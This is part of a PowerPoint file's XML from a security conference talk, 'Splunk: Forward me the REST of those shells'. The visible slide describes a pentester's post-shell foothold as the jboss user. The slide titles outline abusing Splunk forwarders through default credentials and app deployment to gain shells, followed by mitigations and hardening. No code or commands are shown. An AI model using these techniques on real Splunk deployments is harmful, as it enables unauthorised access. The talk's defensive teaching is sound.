          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>So I have my shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Now what?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Limited to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> user (no root dance yet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Hardened/patched OS (RHEL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>One simple oversight:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE380852-D441-0F40-B307-B01B528CB839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="43332" b="-5325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="308920" y="4656979"/>
            <a:ext cx="11558066" cy="774002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1146083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7432</TotalTime>
  <Words>1029</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>166</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Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Splunk: Forward me the REST of those shells</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Anthony Hendricks</vt:lpstr>
      <vt:lpstr>Some Splunk Background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Setting the Stage</vt:lpstr>
      <vt:lpstr>The Pentest Begins</vt:lpstr>
      <vt:lpstr>Some Java/Beanshell Code</vt:lpstr>
      <vt:lpstr>Shell</vt:lpstr>
      <vt:lpstr>Blue Team Turned Evil?</vt:lpstr>
      <vt:lpstr>Default Creds Again?</vt:lpstr>
      <vt:lpstr>Curl to the Rescue</vt:lpstr>
      <vt:lpstr>Abusing Splunk for Fun and Profit</vt:lpstr>
      <vt:lpstr>Splunk TA-Shell</vt:lpstr>
      <vt:lpstr>The Hard Way</vt:lpstr>
      <vt:lpstr>App Deployment</vt:lpstr>
      <vt:lpstr>Then We Wait</vt:lpstr>
      <vt:lpstr>Abusing Splunk for Fun and Profit</vt:lpstr>
      <vt:lpstr>Long Story Short</vt:lpstr>
      <vt:lpstr>The Easy Way</vt:lpstr>
      <vt:lpstr>What About Logging?</vt:lpstr>
      <vt:lpstr>Mitigations: Default Creds</vt:lpstr>
      <vt:lpstr>Mitigations: REST API</vt:lpstr>
      <vt:lpstr>Mitigations: Detection</vt:lpstr>
      <vt:lpstr>Mitigation: Extended Logging</vt:lpstr>
      <vt:lpstr>Extended Logging Example</vt:lpstr>
      <vt:lpstr>Mitigations: TLS</vt:lpstr>
      <vt:lpstr>Mitigations: Run Unprivileged</vt:lpstr>
      <vt:lpstr>Forwarder Hardening Guide</vt:lpstr>
      <vt:lpstr>Questions?</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 Hendricks</dc:creator>
  <cp:lastModifiedBy>Anthony Hendricks</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-27T15:51:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-16T05:22:20Z</dcterms:modified>
</cp:coreProperties>
</file>